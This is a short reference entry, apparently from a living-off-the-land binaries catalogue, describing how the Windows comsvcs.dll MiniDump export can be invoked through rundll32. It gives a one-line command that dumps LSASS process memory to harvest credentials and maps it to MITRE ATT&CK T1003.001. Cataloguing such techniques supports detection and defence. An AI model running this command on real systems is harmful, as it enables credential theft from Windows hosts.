.. / Comsvcs.dll
Star

COM+ Services


Paths:

Resources:
Acknowledgements:

Detection:

Dump

Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Privileges required: SYSTEM
OS: Windows
MITRE ATT&CK®: T1003.001